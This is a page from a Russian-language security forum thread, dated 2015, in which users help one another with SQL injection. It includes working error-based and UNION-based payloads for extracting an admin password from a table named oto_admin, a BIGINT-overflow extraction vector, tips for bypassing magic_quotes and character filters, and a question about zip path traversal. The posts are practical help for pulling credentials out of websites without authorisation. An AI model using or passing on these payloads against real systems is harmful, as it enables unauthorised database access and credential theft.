HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2407 из 2438 « Первая < 14071907230723572397 2403 2404 2405 2406 2407 2408 2409 2410 2411 2417 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #24061  
Старый 05.02.2015, 02:12
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию
Цитата:
Сообщение от YaBtr  
YaBtr said:
При
слепых!
инъекциях Вы и не увидите вывода. Играетесь с boolean-query. В Вашем случае при истине возвращается страница /renew.php?id=1, в обратном же случае начальная страница авторизации.
всё, понятно ) Слепая же. Спасибо !!!
 
Ответить с цитированием

  #24062  
Старый 05.02.2015, 10:18
madam
Guest
Сообщений: n/a
Провел на форуме:
50513

Репутация: 1
По умолчанию
блин, вот так выводится 31 символ ?id=1+|(extractvalue(1,concat(0x3a,(SELECT password FROM oto_admin LIMIT 1)))) ,как вывести последний символ? LIMIT 1,1 пустая страница
 
Ответить с цитированием

  #24063  
Старый 05.02.2015, 10:41
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
Сообщение от madam  
madam said:
блин, вот так выводится 31 символ ?id=1+|(extractvalue(1,concat(0x3a,(SELECT password FROM oto_admin LIMIT 1)))) ,как вывести последний символ? LIMIT 1,1 пустая страница
SELECT mid(password,31,32) FROM oto_admin LIMIT 1
 
Ответить с цитированием

  #24064  
Старый 05.02.2015, 10:44
madam
Guest
Сообщений: n/a
Провел на форуме:
50513

Репутация: 1
По умолчанию
Цитата:
Сообщение от faza02  
faza02 said:
SELECT mid(password,
31,32
) FROM oto_admin LIMIT 1
спасибо)
 
Ответить с цитированием

  #24065  
Старый 05.02.2015, 12:04
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию
Цитата:
Сообщение от madam  
madam said:
блин, вот так выводится 31 символ ?id=1+|(extractvalue(1,concat(0x3a,(SELECT password FROM oto_admin LIMIT 1)))) ,как вывести последний символ? LIMIT 1,1 пустая страница
Данные векторы потихоньку уходят в прошлое. Если версия форка позволяет, используйте вектор с наибольшим количеством вывода символов (475! error-based через begint):

Цитата:
Сообщение от None  
?id=1+|(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (SELECT password FROM oto_admin LIMIT 1)i)a)
Пример: /showpost.php?p=3815102&postcount=23814
 
Ответить с цитированием

  #24066  
Старый 05.02.2015, 22:42
scr1m77
Guest
Сообщений: n/a
Провел на форуме:
283

Репутация: 2
По умолчанию
Есть уязвимый скрипт, который производит распаковку zip-архива, загруженного пользователем.

Можно ли создать zip-архив, который бы распаковывался, например, на диреторию више ("../") ?

Вроде видел пример создания такого архива, но не могу найти.
 
Ответить с цитированием

  #24067  
Старый 06.02.2015, 17:48
izzy
Guest
Сообщений: n/a
Провел на форуме:
1142

Репутация: 0
По умолчанию
вопрос от начинающего

база 5.0.95

вот так вывожу таблицы http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group _concat(table_name),5,6+from+information_schema.ta bles--

нахожу нужную мне таблицу например у меня modx_active_users -

делаю так http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group _concat(column_name),5,6+from+information_schema.c olumns+where+table_name='modx_active_users'--

и получаю такую ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'modx_active_users\\\'--' at line 1

так как начинающий я непойму что делаю нетак!?
 
Ответить с цитированием

  #24068  
Старый 06.02.2015, 17:57
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию
Цитата:
Сообщение от izzy  
izzy said:
вопрос от начинающего
база 5.0.95
вот так вывожу таблицы http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group _concat(table_name),5,6+from+information_schema.ta bles--
нахожу нужную мне таблицу например у меня modx_active_users -
делаю так http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group _concat(column_name),5,6+from+information_schema.c olumns+where+table_name='modx_active_users'--
и получаю такую ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'modx_active_users\\\'--' at line 1
так как начинающий я непойму что делаю нетак!?
Скорее всего magic_quotes_gpc = on

Используйте hex или char.
 
Ответить с цитированием

  #24069  
Старый 06.02.2015, 18:03
reuvenmatbil
Guest
Сообщений: n/a
Провел на форуме:
5818

Репутация: 0
По умолчанию
стоит фильтрация на ( и ). пробовал обойти с помощью urlencode — не вышло

что предпринять можно?
 
Ответить с цитированием

  #24070  
Старый 06.02.2015, 18:04
izzy
Guest
Сообщений: n/a
Провел на форуме:
1142

Репутация: 0
По умолчанию
большое спасибо помог - char
 
Ответить с цитированием
Ответ
Страница 2407 из 2438 « Первая < 14071907230723572397 2403 2404 2405 2406 2407 2408 2409 2410 2411 2417 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ